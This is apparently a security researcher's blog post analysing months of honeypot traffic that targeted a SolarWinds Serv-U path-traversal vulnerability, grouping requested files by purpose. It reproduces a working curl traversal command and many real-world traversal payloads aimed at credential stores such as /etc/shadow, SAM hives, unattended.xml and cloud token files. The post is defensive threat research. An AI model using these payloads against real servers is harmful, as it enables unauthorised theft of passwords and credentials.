On June 5, 2024, SolarWinds released an advisory regarding a path-traversal vulnerability in their “secure” file-transfer product, Serv-U. I wrote about it here back in mid-June when it was fairly recently released. So here we are, three months later - you might be wondering why we’re still talking about this!
When the vulnerability was new, I put a lot of work into crafting a very realistic honeypot that not only looks like the product, it also fakes out the filesystem to make it actually look vulnerable - so vulnerable that you can use the actual exploit to pull a wide range of realistic-looking files! Since the vulnerability came out, I’ve kept a few copies of the honeypot online, and to this day it continues to see an ongoing buzz of traffic.
Why write this now?
Well, looking at my notes, I started pulling data to write this blog on July 8, July 31, and again today (September 23, 2024, as I start writing this). This time I actually got everything together, and it’s finally time to see what we can learn! Looking at the data, it seems like the perfect time, because it’s been about a month since we’ve seen a meaningful change in the exploits.
I’ve gone on record in past publications saying that I’m deeply unconvinced that meaningful widespread exploitation will occur with this type of vulnerability. So an attacker can read an arbitrary file - so what? While I see value in targeted attacks, what’s the point of scanning the entire internet for a specific file?
Let’s see if I can convince myself as I dive into the data - I can’t wait to find out!
The vulnerability
I went over the vulnerability in more detail in my previous write-up, but the simple version is:
- SolarWinds Serv-U will return a file when it receives a request with the arguments ?InternalDir=<dir>&InternalFile=<filename>
- When it receives such a request, it attempts to prevent directory traversal by ensuring that the directory does not contain ../ (on Linux), or ..\ (on Windows)
- Before actually serving the file, it converts slashes to the correct direction (so on Windows, / becomes \, and on Linux \ becomes /)
Together, that means that the software verifies that the directory doesn’t contain path-traversal characters appropriate to the operating system - then adds them!
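To make the ordering problem concrete, here is a minimal Ruby model of the check-then-convert logic described above. It is only an illustration: the method names and the :linux / :windows symbols are made up for this sketch, and it is not SolarWinds' actual code.

```ruby
# Hypothetical model of the flawed logic; NOT the real Serv-U implementation.
# platform is :linux or :windows (names invented for this sketch).

# Step 1: reject directories containing the platform's own traversal sequence.
def traversal_blocked?(dir, platform)
  bad = platform == :windows ? "..\\" : "../"
  dir.include?(bad)
end

# Step 2: flip slashes to the direction the platform expects.
def fix_slashes(dir, platform)
  platform == :windows ? dir.tr("/", "\\") : dir.tr("\\", "/")
end

# The check runs BEFORE the conversion, so "wrong-way" slashes slip through
# and are then turned into a working traversal.
def served_path(dir, file, platform)
  return nil if traversal_blocked?(dir, platform)
  sep = platform == :windows ? "\\" : "/"
  fix_slashes(dir, platform) + sep + file
end

puts served_path("\\..\\..\\..\\..\\etc", "passwd", :linux)
p served_path("/../../../../etc", "passwd", :linux)
```

In this model, the backslash payload passes the Linux check and comes out as a forward-slash traversal, while the "honest" forward-slash payload is rejected.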
The cool part about this is that we can distinguish payloads destined for Windows vs Linux by looking for slashes that go in the wrong direction.
The data
On September 23, 2024, I exported all traffic containing InternalDir= from our database, trimmed it down to just the date and the URL, and called it original.txt. It’s otherwise entirely unprocessed, so if you can use it to draw your own conclusions, that’s awesome! Be sure to tell me about them!
That data has a lot of problems, though, some of which are caused by the HTTP protocol (specifically, URL encoding) and some of which are caused by mistakes by the attackers - we’ll get into that more (or you can just grab the cleaned version and skip ahead).
I should also note that this isn’t the same dataset from the previous blog - this is all new data!
URL encoding
URL encoding is a common way to encode URL arguments in an HTTP request. Characters in the URL are replaced with a % sign and a hex representation of the character. %5C can represent \, for example, so you might see a request like:
InternalDir=%5C..%5C..%5C..%5Cetc&InternalFile=shadow
But that’s just another way to encode slashes; we can decode them with this Ruby (irb) command, among many, many other ways:
irb(main):001:0> require 'cgi'
=> true
irb(main):002:0> puts CGI.unescape('InternalDir=%5C..%5C..%5C..%5Cetc&InternalFile=shadow')
InternalDir=\..\..\..\etc&InternalFile=shadow
Sometimes we run into URL encodings for multi-byte characters (i.e., UTF-8), such as:
InternalDir=\..\..\..\..\etc^&InternalFile=passwd%D1%8D
Which decodes to:
irb(main):003:0> puts CGI.unescape('InternalDir=\..\..\..\..\etc^&InternalFile=passwd%D1%8D')
InternalDir=\..\..\..\..\etc^&InternalFile=passwdэ
Before we started analyzing the data, we decoded all the URLs. We also checked for other gotchas - that the arguments are in the correct order, there are no extraneous arguments, stuff like that - thankfully, most of the attackers were rather polite in most regards.
In that decoded URL, however, there are two errant characters: a caret (^) and an э. What’s going on with that?
Copying extra junk
The first question is, why is there a Cyrillic character (э) on the end of the request?
I can only imagine that, in the same way as we saw Chinese punctuation in my previous blog, we’re seeing a copy/paste error. Whoever configured the attack probably accidentally copied an extra character, which got included in an internet scan.
It’s interesting that at least one attacker last time was using a Chinese alphabet, and this time one is using the Cyrillic alphabet - it’s weak attribution, but seeing attackers that are using Chinese and Russian character sets is very interesting!
We removed all weird UTF-8 characters in the clean dataset (which, it turns out, was just that one this time).
Errant caret
The next question is, what’s with the caret (^)? You’ll see it in this and other requests, such as:
InternalDir=\..\..\..\..\etc^&InternalFile=group
InternalDir=\..\..\..\..\etc^&InternalFile=group/root
InternalDir=\..\..\..\..\etc^&InternalFile=group
InternalDir=\..\..\..\..\etc^&InternalFile=hosts
InternalDir=\..\..\..\..\etc^&InternalFile=group
I actually covered that one in my previous blog, but I find it funny and want to mention it again!
Basically, one of the first analyses published about the vulnerability was from my old colleague Stephen Fewer, who for some reason uses Windows as his analysis machine (I try not to judge life choices!). On the Windows command line (cmd.exe), the caret symbol is used as the escape character, so in his examples he uses it (correctly!) to escape the ampersand:
>curl -i -k --path-as-is https://192.168.86.43/?InternalDir=\..\..\..\..\etc^&InternalFile=passwd
If somebody were to take that payload (without understanding it) and try to run it against targets on the internet (without testing it), they’d end up with a broken payload that includes a caret.
In our dataset, we “fixed” those by removing the ^ from the requests.
Broken requests
Some of the hits are missing arguments altogether - we just removed those:
InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/
InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/
InternalDir=........etc
InternalDir=\..\..\..\..\etc
We removed that from our dataset.
Those fixes together give us original-clean.txt as our next step.
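For anyone who wants to reproduce the cleanup on the raw file, here is a rough Ruby sketch of the fixes described above: URL-decoding, dropping the caret, dropping stray non-ASCII characters, and discarding requests that are missing an argument. The clean_query name is made up for this example, and stripping everything non-ASCII is a simplifying assumption rather than a description of the exact cleanup that was run.

```ruby
require 'cgi'

# Hypothetical cleanup helper (the name is invented for this sketch).
# Takes the raw query string and returns the cleaned version, or nil if the
# request should be dropped because an argument is missing.
def clean_query(raw)
  query = CGI.unescape(raw).scrub("")      # undo URL encoding; drop invalid bytes
  query = query.gsub("^", "")              # remove the copy/pasted cmd.exe escape
  query = query.gsub(/[^[:ascii:]]/, "")   # assumption: strip all non-ASCII junk
  # Keep only requests that carry both arguments, in the expected order.
  return nil unless query.match?(/\AInternalDir=.*&InternalFile=.+\z/)
  query
end

puts clean_query('InternalDir=\..\..\..\..\etc^&InternalFile=passwd%D1%8D')
p clean_query('InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/')
```

The second call returns nil because there is no InternalFile argument, which mirrors the broken requests that were removed.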
Normalization
Since data is (as always) messy, I “normalized” the data for easier comparisons. I dunno how scientific it is, but basically I…
- Combined the directory / filename into a single path (as opposed to URL arguments)
- Determined whether it’s Linux or Windows (based on the direction of the path-traversal slashes), then, using that determination, I:
- Corrected all the slashes to what the OS expects
- Removed the path-traversal characters
- Added either a c:\ (Windows) or / (Linux) at the front
- Removed double slashes and other weirdness
That gives us a much nicer list to work from!
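The steps above can be sketched in a few lines of Ruby. Treat this as one possible interpretation, not the exact script: the normalize name is made up, requests without any traversal sequence are simply skipped, trailing slashes are dropped, and lowercasing Windows paths is an assumption inferred from how the normalized entries look.

```ruby
# Hypothetical normalizer (name and details are assumptions for this sketch).
# Returns a normalized path, or nil if no traversal sequence is present.
def normalize(dir, file)
  combined = "#{dir}/#{file}"

  # Wrong-way slashes reveal the target: backslash traversal only works
  # against Linux, and forward-slash traversal only works against Windows.
  if combined.include?("..\\")
    sep = "/"
    root = "/"
  elsif combined.include?("../")
    sep = "\\"
    root = "c:\\"
  else
    return nil
  end

  # Split on runs of either slash, then drop empty pieces and traversal parts.
  parts = combined.split(%r{[/\\]+})
  parts = parts.reject { |part| part.empty? || part == "." || part == ".." }

  path = root + parts.join(sep)
  # Assumption: Windows paths are lowercased so that case variants match.
  sep == "\\" ? path.downcase : path
end

puts normalize("\\..\\..\\..\\..\\etc", "passwd")
puts normalize("/./../../../ProgramData/RhinoSoft/Serv-U/", "Serv-U-StartupLog.txt")
```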
Analysis
Now, what can we learn from all this?
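I analyzed this data in three different ways:
- Most common requests
- First time each request was observed
- Grouped by the “purpose” of the file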
Let’s look at what each of them tells us!
Most common requests
I counted how many times we saw each request in the normalized list and sorted it by frequency, creating this list.
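If you want to redo the count yourself, something like the following Ruby works on any list of normalized paths. The request_counts name and the sample array are made up for illustration (the sample is toy data, not the real dataset), and Enumerable#tally needs Ruby 2.7 or newer.

```ruby
# Count how often each normalized path appears, most frequent first.
# Ties are broken alphabetically so the output is stable.
def request_counts(paths)
  paths.tally.sort_by { |path, count| [-count, path] }
end

# Toy input for illustration only; NOT the real dataset.
sample = [
  "/etc/passwd",
  "c:\\windows\\win.ini",
  "/etc/passwd",
  "/etc/shadow",
  "/etc/passwd"
]

request_counts(sample).each do |path, count|
  puts format("%7d %s", count, path)
end
```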
The three most common requests are at least somewhat telling:
135 /etc/passwd
102 c:\windows\win.ini
82 c:\programdata\rhinosoft\serv-u\serv-u-startuplog.txt
Because a) the first two are the most common files used in vulnerability checks, and b) all three are the files that the public proofs of concept used. So no surprise that they’re common - people frequently take a proof of concept and run it against the internet.
Something I find interesting is the position of the Linux payloads: /etc/passwd is the #1 most common and /etc/shadow is 15th most common, but the next Linux payload is /etc/resolv.conf at 52nd place, followed by /etc/group at 125th place. In fact, the only “real” payloads for Linux (i.e., ones that might actually return something private) are /etc/shadow and /root/.bash_history (and maybe /var/log/auth.log). That’s pretty much it! It seems like, while the most common scan looked for Linux systems, people ultimately weren’t actually trying to exploit Linux very much.
Going back to the list - the 4th most common file requested was c:\users\administrator\ntuser.dat, which is another “probably always exists” file used by some scanners but not containing anything particularly private.
Starting at the 5th most common, the next few look pretty important:
34 c:\windows\panther\unattended.xml
32 c:\windows\sysprep\sysprep.xml
32 c:\windows\sysprep\sysprep.inf
31 c:\windows\sysprep.inf
31 c:\windows\panther\unattend\unattended.xml
27 c:\windows\system32\sysprep\unattend.xml
27 c:\windows\system32\sysprep\unattended.xml
27 c:\windows\panther\unattend.xml
27 c:\windows\panther\unattend\unattend.xml
Attackers were really going after unattended.xml and sysprep.xml (plus variations)! I looked into unattended.xml a bit, and noticed that it can have passwords in it, unsurprisingly (there’s even a Metasploit post-exploitation module). Likewise, sysprep.xml shows up on lists of files with plaintext credentials.
The next group of files (and the last I’ll look at in this section) are also Windows-focused:
10 c:\windows\system32\config\system.sav
10 c:\windows\system32\config\software.sav
10 c:\windows\system32\config\security.sav
10 c:\windows\system32\config\regback\system
10 c:\windows\system32\config\regback\sam
10 c:\windows\system32\config\default.sav
10 c:\windows\repair\system
10 c:\windows\repair\sam
These are all (or mostly all?) registry hives, including the Windows registry and the Windows password store - SAM - the equivalent to /etc/shadow. I don’t believe you can actually read that file, so I don’t expect that this actually worked for the attackers.
My conclusion from looking at the frequency of different requests is that the most common exploit attempts we saw were vulnerability scanners or people testing their proofs of concept, but that attackers performed a non-trivial amount of earnest exploitation - trying to access private passwords and other data. That sorta surprised me!
First time each request was observed
Next, I sorted the requests by the datestamp, and only kept the earliest version of each request, thus getting a list of the first time each payload was observed.
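That "earliest sighting" step is easy to express in Ruby: sort by timestamp, then keep the first row for each path. In this sketch the first_seen name is made up, and the rows are toy data (some timestamps are borrowed from the listings in this post, the repeats are invented to show the de-duplication).

```ruby
require 'time'

# rows is an array of [iso8601_timestamp, normalized_path] pairs.
# Returns one row per path: the earliest time it was seen, in time order.
def first_seen(rows)
  sorted = rows.sort_by { |stamp, _path| Time.iso8601(stamp) }
  sorted.uniq { |_stamp, path| path } # uniq keeps the first (earliest) match
end

# Toy rows for illustration only; the repeated sightings are invented.
rows = [
  ["2024-08-13T09:00:00+00:00", "/root/.bash_history"],
  ["2024-07-20T14:53:58+00:00", "/etc/group"],
  ["2024-08-12T22:27:37+00:00", "/root/.bash_history"],
  ["2024-07-21T08:15:00+00:00", "/etc/group"]
]

first_seen(rows).each { |stamp, path| puts "#{stamp} #{path}" }
```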
The very first requests seen are from June 24, 2024. There’s nothing really to read into that - that’s simply when I deployed the honeypots that detect this traffic.
For the first week or two, we saw mostly vulnerability scans.
Then, on July 3, somebody tried fetching a bunch of hopeful files that might contain logins - desktop/password.csv and such. I doubt they found much, but I did enjoy seeing those hopeful requests:
2024-07-03T18:41:16+00:00 c:\users\administrator\desktop\logins.csv
2024-07-03T18:41:16+00:00 c:\users\administrator\desktop\password.csv
2024-07-03T18:41:17+00:00 c:\users\administrator\desktop\1.csv
2024-07-03T18:41:18+00:00 c:\users\administrator\desktop\logins.txt
2024-07-03T18:41:19+00:00 c:\users\administrator\desktop\password.txt
2024-07-03T18:41:20+00:00 c:\users\administrator\desktop\1.txt
On July 7, a huge surge of new requests came in - INI files, httpd.conf, MySQL and Postgres config/log/data files, the Windows registry files, the first attempts to fetch the unattended.xml files, and a bunch more. Presumably somebody did a big wave of scanning with a new list that day:
2024-07-07T13:23:42+00:00 c:\documents and settings\administrator\ntuser.dat
2024-07-07T13:23:43+00:00 c:\apache\logs\access.log
2024-07-07T13:23:43+00:00 c:\apache\logs\error.log
2024-07-07T13:23:44+00:00 c:\apache\php\php.ini
2024-07-07T13:23:45+00:00 c:\boot.ini
[...]
2024-07-07T13:23:53+00:00 c:\php\php.ini
2024-07-07T13:23:54+00:00 c:\program files\apache group\apache2\conf\httpd.conf
2024-07-07T13:23:55+00:00 c:\program files\apache group\apache\conf\httpd.conf
[...]
2024-07-07T13:24:30+00:00 c:\windows\system32\config\security.sav
2024-07-07T13:24:31+00:00 c:\windows\system32\config\software.sav
2024-07-07T13:24:31+00:00 c:\windows\system32\config\system.sav
2024-07-07T13:24:32+00:00 c:\windows\system32\config\regback\default
2024-07-07T13:24:33+00:00 c:\windows\system32\config\regback\sam
2024-07-07T13:24:34+00:00 c:\windows\system32\config\regback\security
2024-07-07T13:24:35+00:00 c:\windows\system32\config\regback\system
2024-07-07T13:24:36+00:00 c:\windows\system32\config\regback\software
[...]
2024-07-07T13:25:16+00:00 c:\usr\local\pgsql\data\postgresql.conf
2024-07-07T13:25:17+00:00 c:\usr\local\pgsql\data\pg_hba.conf
2024-07-07T13:25:18+00:00 c:\usr\internet\pgsql\data\pg_hba.conf
Then, nothing new until July 20! On July 20, somebody searched for a bunch of Linux configuration files - /etc/ssh/sshd_config and /etc/hostname and such. I guess somebody was looking for vulnerable Linux hosts for a change?
2024-07-20T14:46:18+00:00 /etc/ssh/sshd_config
2024-07-20T14:46:36+00:00 /etc/shh/sshd_config
2024-07-20T14:48:08+00:00 /etc/hostname
2024-07-20T14:50:40+00:00 /var/log/auth.log
2024-07-20T14:53:09+00:00 /etc/netplan/
2024-07-20T14:53:32+00:00 /etc/id.so.preload
2024-07-20T14:53:58+00:00 /etc/group
2024-07-20T14:54:31+00:00 /etc/hosts
2024-07-20T15:03:50+00:00 /etc/group/root
Then, again, no activity until July 29, when somebody apparently fired up a broken tool of some sort that filled my log with invalid files, such as:
2024-07-29T15:16:41+00:00 c:\attend.inf\unattend.inf
2024-07-29T15:16:42+00:00 c:\m\sam
2024-07-29T15:16:43+00:00 c:\stem\system
2024-07-29T15:16:44+00:00 c:\edentials\credentials
2024-07-29T15:16:44+00:00 c:\edentials.db\credentials.db
2024-07-29T15:16:44+00:00 c:\gacy_credentials\legacy_credentials
2024-07-29T15:16:45+00:00 c:\cess_tokens.db\access_tokens.db
2024-07-29T15:16:45+00:00 c:\cesstokens.json\accesstokens.json
2024-07-29T15:16:45+00:00 c:\ureprofile.json\azureprofile.json
It kinda looks like they mistakenly used the same variable for the directory and the filename, but only kept part of the directory? I’m not really sure, but there are an awful lot of requests in that vein, all at around 15:10 - 15:20. A few minutes later, it looks like they fixed their tool (or maybe somebody else scanned concurrently?) and actually tried a few valid files:
2024-07-29T15:19:03+00:00 c:\sysprep.xml\sysprep.xml
2024-07-29T15:19:03+00:00 c:\sysprep.inf\sysprep.inf
2024-07-29T15:19:04+00:00 c:\unattended.xml\unattended.xml
2024-07-29T15:19:04+00:00 c:\unattend.xml\unattend.xml
2024-07-29T15:19:16+00:00 c:\windows\sysprep\sysprep.xml
2024-07-29T15:19:16+00:00 c:\windows\sysprep\sysprep.inf
2024-07-29T15:19:16+00:00 c:\windows\sysprep.inf
2024-07-29T15:19:49+00:00 c:\windows\panther\unattend.xml
2024-07-29T15:19:50+00:00 c:\windows\panther\unattend\unattend.xml
2024-07-29T15:19:51+00:00 c:\windows\system32\sysprep\unattend.xml
2024-07-29T15:19:51+00:00 c:\windows\system32\sysprep\unattended.xml
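The odd requests from that broken tool share a recognizable shape: the "directory" is a trailing piece of the filename (often the filename minus its first two characters, sometimes the whole filename). A quick Ruby check like the one below can flag them in a normalized list. The doubled_name? helper is made up for this sketch, and it only describes the pattern in the logs; it says nothing certain about what the attacker's tool actually did.

```ruby
# Hypothetical helper: true when a normalized Windows path looks like
# c:\<dir>\<file> and <dir> is just the tail end of <file>.
def doubled_name?(path)
  parts = path.split("\\")
  return false unless parts.length == 3
  _drive, dir, file = parts
  file.end_with?(dir)
end

[
  "c:\\attend.inf\\unattend.inf",
  "c:\\m\\sam",
  "c:\\sysprep.xml\\sysprep.xml",
  "c:\\windows\\sysprep.inf"
].each do |path|
  puts "#{doubled_name?(path) ? 'broken' : 'ok    '} #{path}"
end
```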
Interestingly, we see the first bunch of requests for cloud credentials (AWS, Azure, Gcloud) about 10 minutes later at 15:31:
2024-07-29T15:31:49+00:00 c:\users\administrator\.aws\credentials
2024-07-29T15:31:49+00:00 c:\users\administrator\appdata\roaming\gcloud\credentials.db
2024-07-29T15:31:50+00:00 c:\users\administrator\appdata\roaming\gcloud\legacy_credentials
2024-07-29T15:31:50+00:00 c:\users\administrator\appdata\roaming\gcloud\access_tokens.db
2024-07-29T15:31:50+00:00 c:\users\administrator\.azure\accesstokens.json
[...]
After July 29, we see no new traffic for a couple weeks until August 12, when somebody tried to fetch just a single file (though a good one!):
2024-08-12T22:27:37+00:00 /root/.bash_history
Then, on August 30, we see one final new request:
2024-08-30T07:18:45+00:00 c:\programdata\rhinosoft\serv-u\serv-u.archive
And that’s it! No new payloads in nearly a month! I guess that’s a sign that no new tooling is being developed? Everybody is bored and moved on, or all possible targets are patched?
Looking at how the payload changed over the past three months, and when new paths were attempted, is fascinating to me - are these the same threat groups getting new ideas? Are these different groups who add this to their tooling at different periods? Are these malicious research projects from individuals? I have no idea!
Grouped by the “purpose” of the file
I saved “purpose” for the end because it’s more hand-wavey - basically, I went through every file, and (with Google and Perplexity trying, and failing, to help), I categorized the purposes of each file that attackers are trying to exfiltrate, which gives me this list. I’ll talk about a few files from each category and why I think they’re interesting!
Scanners
The heaviest group of files is what I called scanners - files that generally always exist, but don’t really have any interesting data, making them perfect for vulnerability checks:
135 /etc/passwd
102 c:\windows\win.ini
82 c:\programdata\rhinosoft\serv-u\serv-u-startuplog.txt
41 c:\users\administrator\ntuser.dat
16 c:\shares\serv-u.fileshares
6 /etc/resolv.conf
4 c:\winnt\win.ini
4 c:\windows\system32\drivers\etc\hosts
4 c:\user.dat\ntuser.dat
4 c:\documents and settings\administrator\ntuser.dat
4 c:\boot.ini
3 /etc/group
[...]
Many of these were included in proofs of concept or are the go-to files that all of us hackers are familiar with. The third one - serv-u-startuplog.txt - was listed in proofs of concept, because it’s included with the vulnerable application and makes a great target. Interesting that /etc/passwd and c:\windows\win.ini were preferred! I noted it earlier, but it’s also interesting to me that /etc/passwd is the most frequently requested file, but “real” Linux attacks are reasonably uncommon.
We respond to most of those requests with fake (but plausible!) files, which may have helped solicit further traffic that we saw.
Windows credential files
The second group is what I called windows credential files - files that are often present on Windows systems and can contain private information. These are likely “real” attackers who are trying to get illicit access to systems:
34 c:\windows\panther\unattended.xml
32 c:\windows\sysprep\sysprep.xml
32 c:\windows\sysprep\sysprep.inf
[...]
10 c:\windows\system32\config\system.sav
10 c:\windows\system32\config\software.sav
10 c:\windows\system32\config\security.sav
10 c:\windows\system32\config\regback\system
10 c:\windows\system32\config\regback\sam
10 c:\windows\system32\config\default.sav
10 c:\windows\repair\system
10 c:\windows\repair\sam
[...]
4 c:\windows\system32\config\secevent.evt
[...]
These include unattended.xml and sysprep.xml which, as we discussed earlier, contain passwords. Then we see the Windows Registry hives, the password (SAM) file, and event logs. These would all contain a massive amount of information for a would-be attacker, though many of those will likely fail due to permissions errors.
Web files
I named the next group web files, and they include configuration files for PHP, Apache, Nginx, and IIS, but entirely created for Windows targets:
12 c:\php\php.ini
8 c:\xampp\apache\bin\php.ini
8 c:\winnt\php.ini
8 c:\apache\php\php.ini
7 c:\windows\php.ini
6 c:\windows\inetpub\wwwroot\web.config
[...]
4 c:\netserver\bin\stable\apache\php.ini
4 c:\inetpub\wwwroot\global.asa
4 c:\inetpub\logs\logfiles\w3svc1\u_ex[yymmdd].log
4 c:\apache\logs\error.log
4 c:\apache\logs\access.log
3 c:\xampp\apache\logs\error.log
3 c:\windows\system32\inetsrv\config\schema\aspnet_schema.xml
3 c:\program files (x86)\xampp\apache\conf\httpd.conf
I separated these out because I’m unclear whether the folks hitting those files are looking for passwords or scanning for vulnerabilities. It’s unlikely that most of those would contain particularly private information, but they’re a great way to enumerate the application! I imagine these are more useful in a targeted attack, where somebody is trying to gather information about the application(s) running on the server.
I’m kinda wondering who would actually run these types of servers on the same host as Serv-U, but somebody probably does…
Databases
In the group I called databases, I included both database configurations and database data files. These also appear to be a mixture of enumeration (determining what the hosts are running) and data theft - if attackers can fetch the databases, they suddenly have your users, passwords, and whatever other data you store there! Here’s a selection of those requests:
8 c:\program files\mysql\mysql server 5.0\my.ini
8 c:\program files\mysql\mysql server 5.0\data\mysql.err
8 c:\program files\mysql\mysql server 5.0\data\mysql-bin.log
[...]
4 c:\var\postgresql\db\postgresql.conf
4 c:\var\lib\pgsql\data\postgresql.conf
4 c:\usr\local\pgsql\data\postgresql.conf
[...]
4 c:\program files\microsoft sql server\mssql.1\template data\master.mdf
4 c:\program files\microsoft sql server\mssql14.sqlexpress\template data\master.mdf
4 c:\program files\microsoft sql server\mssql13.sqlexpress\template data\master.mdf
[...]
I appreciate that they’re once again thorough - they’re looking for MySQL, PostgreSQL, and SQL Server. Sorry, Oracle!
Once again, it makes me wonder who would be running databases on the same server as Serv-U.
Broken
This is my second-favourite category: broken files! These include broken tooling (that messes up the directory), typos, and requests for directories as if they’re files (which I don’t believe works). I probably missed some typos in files I’m not familiar with, but this is what I came up with:
6 c:\windows\inetpub\wwwroot\conntectionstrings.config
6 c:\stem\system
6 c:\m\sam
2 c:\ureprofile.json\azureprofile.json
2 c:\unattend.xml\unattend.xml
2 c:\sysprep.inf\sysprep.inf
2 c:\stem.sav\system.sav
2 c:\nsolehost_history\consolehost_history
2 c:\nntectionstrings.config\conntectionstrings.config
2 c:\gacy_credentials\legacy_credentials
2 c:\ftware.sav\software.sav
2 c:\fault.sav\default.sav
2 c:\edentials.db\credentials.db
2 c:\edentials\credentials
2 c:\curity.sav\security.sav
2 c:\cesstokens.json\accesstokens.json
2 c:\cess_tokens.db\access_tokens.db
2 c:\b.config\web.config
2 c:\attend.txt\unattend.txt
2 c:\attend.inf\unattend.inf
1 /var/backups
1 /var
1 /etc/shh/sshd_config
1 /etc/netplan/
1 /etc/id.so.preload
My favourite is the shh folder (don’t tell!) and id.so.preload. The poor attacker who scanned the internet for /etc/id.so.preload probably thought they were so clever! The ld.so.preload file is a real file that the Linux dynamic linker reads (though it’s often absent by default) and isn’t one that folks usually request, so it may have flown under the radar. But they used id instead of ld, so they almost certainly found nothing. Sad!
Interesting config files
I called the next group interesting config files, and it’s a bunch of different Cloud services (Azure, AWS, and Gcloud), as well as FileZilla:
6 c:\users\administrator\.azure\azureprofile.json
6 c:\users\administrator\.azure\accesstokens.json
6 c:\users\administrator\.aws\credentials
6 c:\users\administrator\appdata\roaming\gcloud\legacy_credentials
6 c:\users\administrator\appdata\roaming\gcloud\credentials.db
6 c:\users\administrator\appdata\roaming\gcloud\access_tokens.db
6 c:\users\administrator\appdata\microsoft\windows\powershell\psreadline\consolehost_history
4 c:\program files\filezilla server\filezilla server.xml
3 c:\program files (x86)\filezilla server\filezilla server.xml
It’s a bit weird that somebody would log into those services from a server, but you never know unless you try! I’m curious if they ever found anything.
Fun guesses
Okay, this one is my actual favourite - fun guesses. Somebody had the idea, “what if the administrator put a password file on their desktop?” and took some guesses. I don’t want the Bad Guys to actually get any data, but still I kinda hope they got something for this long shot:
8 c:\users\administrator\desktop\password.txt
8 c:\users\administrator\desktop\password.csv
8 c:\users\administrator\desktop\logins.txt
8 c:\users\administrator\desktop\logins.csv
8 c:\users\administrator\desktop\1.txt
8 c:\users\administrator\desktop\1.csv
Linux cred files
The last group, with a measly two entries, is Linux cred files:
13 /etc/shadow
2 /root/.bash_history
It’s interesting that /etc/passwd is one of the most common guesses, but actual Linux exploitation is limited!
Conclusion
I’m not sure what the takeaway of this is, besides “here’s some neat data!”
I guess my personal takeaway is: I’ve said, many times, that as a wide-scale attack the value of path-traversal attacks that let you read arbitrary files is questionable. In a targeted attack, you can probably read config files, application source code, databases, and all that fun stuff, and use that to target an organization. But is there value in scanning the entire internet?
Apparently, to many, the answer is yes - the creativity and persistence are actually rather impressive. I learned a lot! I wonder how many of these actually turned up data? I’ll probably never know.
Additionally, as a honeypot-creator, it also gives me a great list of files in which to stick honeytokens to help fool future attackers! :)